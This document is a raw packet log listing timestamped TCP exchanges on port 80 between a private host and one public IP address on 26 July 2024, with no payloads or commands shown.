Jul 26, 2024 12:57:50.924453020 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.924472094 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.924510002 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.924601078 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.924619913 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.924645901 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.924670935 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.999249935 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.999294996 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.999314070 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.999408960 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.999427080 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.999452114 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.999454021 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.999454021 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.999475002 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.999481916 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.999722958 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.999742031 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.999766111 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.999784946 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.999793053 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.999810934 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.999813080 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.999833107 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.999833107 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.999850988 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.999867916 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.999916077 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.999955893 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.000073910 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.000092983 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.000108957 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.000119925 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.000133038 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.000144958 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.000153065 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.000195980 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.000221968 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.000237942 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.000253916 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.000269890 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.000281096 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.000297070 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.000317097 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.000344038 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.000359058 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.000377893 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.000384092 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.000391006 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.000403881 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.000411034 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.000418901 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.000435114 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.000444889 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.000463963 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.000472069 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.000489950 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.000504971 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.000525951 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.000560045 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.001136065 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.001151085 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.001166105 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.001178980 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.001194000 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.001200914 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.001209021 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.001223087 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.001233101 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.001245975 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.001260996 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.001281023 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.001287937 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.001302958 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.001312017 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.001322031 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.001333952 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.001343966 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.001358986 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.001368999 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.001391888 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.001760960 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.001775026 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.001790047 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.001801014 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.001815081 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.001821995 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.001832008 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.001848936 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.001858950 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.001882076 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.001888990 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.001904011 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.001919985 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.001926899 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.001936913 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.001950026 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.001959085 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.001971006 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.001981020 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.001995087 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.002003908 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.002016068 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.002027988 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.002041101 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.002051115 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.002062082 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.002073050 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.002084970 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.002094984 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.002109051 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.002120972 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.002145052 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.002903938 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.002919912 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.002933979 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.002943993 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.002958059 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.002965927 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.002975941 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.002990007 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.003005028 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.003020048 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.003031969 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.003041029 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.003053904 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.003067017 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.003077984 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.003087997 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.003101110 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.003110886 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.003123999 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.003142118 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.003166914 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.003684044 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.003700018 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.003715992 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.003727913 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.003739119 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.003755093 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.003766060 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.003783941 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.003798008 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.003818035 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.003825903 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.003837109 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.003848076 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.003859043 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.003871918 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.003880978 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.003894091 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.003904104 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.003916979 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.003927946 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.003941059 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.003950119 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.003962040 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.003973961 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.003987074 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.003995895 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.004009962 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.004019022 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.004031897 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.004041910 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.004055977 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.004065990 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.004080057 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.004090071 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.004102945 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.004112959 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.004126072 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.004134893 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.004158974 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.004379988 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.004395962 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.004414082 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.004420996 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.004429102 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.004442930 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.004450083 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.004463911 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.004478931 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.004499912 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.004499912 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.004529953 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.004549026 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.004565001 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.004584074 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.004590988 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.004600048 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.004615068 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.004621983 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.004637003 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.004654884 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.004662037 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.004671097 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.004686117 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.004693985 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.004726887 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.020164013 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.020184040 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.020195007 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.020246983 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.020273924 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.020379066 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.020387888 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.020397902 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.020432949 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.020432949 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.020442009 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.094382048 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.094422102 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.094430923 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.094583035 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.094593048 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.094602108 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.094610929 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.094615936 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.094672918 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.094852924 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.094861031 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.094870090 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.094882011 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.094885111 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.094897985 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.094902992 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.094918013 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.094949961 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.095118999 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.095129013 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.095165968 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.095172882 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.095182896 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.095191956 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.095201015 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.095210075 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.095220089 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.095251083 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.095607042 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.095614910 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.095624924 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.095633030 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.095640898 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.095649004 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.095659018 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.095664024 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.095671892 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.095680952 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.095690012 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.095696926 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.095705032 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.095710039 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.095719099 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.095748901 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.096214056 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.096223116 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.096232891 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.096241951 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.096251965 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.096259117 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.096266031 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.096275091 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.096282959 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.096288919 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.096297979 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.096302032 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.096311092 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.096319914 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.096326113 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.096333981 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.096348047 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.096362114 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.096385002 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.096724987 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.096734047 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.096766949 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.096918106 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.096927881 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.096937895 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.096949100 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.096956968 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.096965075 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.096972942 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.096980095 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.096988916 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.096998930 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.097006083 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.097013950 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.097024918 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.097031116 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.097039938 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.097045898 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.097054958 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.097064972 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.097070932 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.097080946 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.097090960 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.097115993 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.097856998 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.097867966 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.097877979 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.097889900 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.097898960 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.097908974 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.097917080 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.097923994 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.097932100 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.097940922 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.097948074 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.097955942 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.097965956 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.097971916 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.097980022 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.097987890 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.097995043 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.098002911 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.098010063 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.098017931 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.098025084 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.098032951 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.098040104 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.098047018 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.098052979 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.098061085 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.098084927 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.098113060 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.098818064 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.098829031 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.098839045 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.098849058 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.098858118 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.098864079 CEST	80	60836	198.46.178.145	192.168.2.6
